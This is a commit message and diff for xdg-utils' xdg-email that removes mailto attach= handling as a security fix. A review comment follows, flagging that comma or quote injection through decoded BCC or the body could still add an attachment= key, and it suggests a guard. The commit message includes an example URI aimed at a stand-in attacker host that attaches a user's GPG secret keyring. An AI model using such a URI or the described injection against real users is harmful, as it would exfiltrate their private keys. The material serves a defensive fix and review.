xdg-email: remove attachment handling from mailto

Handling the attach= parameter allows an attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
and xdg/xdg-utils#177

Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
parent 9816ebb3
......@@ -32,7 +32,7 @@ _USAGE
run_thunderbird()
{
local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
THUNDERBIRD="$1"
MAILTO=$(echo "$2" | sed 's/^mailto://')
echo "$MAILTO" | grep -qs "^?"
......@@ -48,7 +48,6 @@ run_thunderbird()
BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
if [ -z "$TO" ] ; then
NEWMAILTO=
......@@ -68,10 +67,6 @@ run_thunderbird()
NEWMAILTO="${NEWMAILTO},$BODY"
fi
if [ -n "$ATTACH" ] ; then
NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
fi
NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
"$THUNDERBIRD" -compose "$NEWMAILTO"
......
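Review bot: Dropping the `attach=` parser does not by itself keep an `attachment=` key out of the string handed to `"$THUNDERBIRD" -compose "$NEWMAILTO"` in the last hunk, because that string is still a comma-joined list assembled from URI-controlled values. In the visible lines `BCC` is percent-decoded, so an encoded comma or quote becomes literal, and `$BODY` is appended with `NEWMAILTO="${NEWMAILTO},$BODY"` without filtering; whether Thunderbird would read an embedded `,attachment=` as a separate key depends on quoting done in parts of run_thunderbird that lie outside these hunks, so this needs confirming. A guard just before the compose call would close it either way, for example `case "$NEWMAILTO" in *attachment=*) DEBUG 1 "refusing attachment= in compose string"; return 1 ;; esac`, accepting that it also rejects a body that merely mentions that text. Separately, the unquoted inner `$(...)` in `/bin/echo -e $( ... )` on the `BCC=` line lets the shell word-split and glob-expand URI-derived text; quoting that substitution would avoid it.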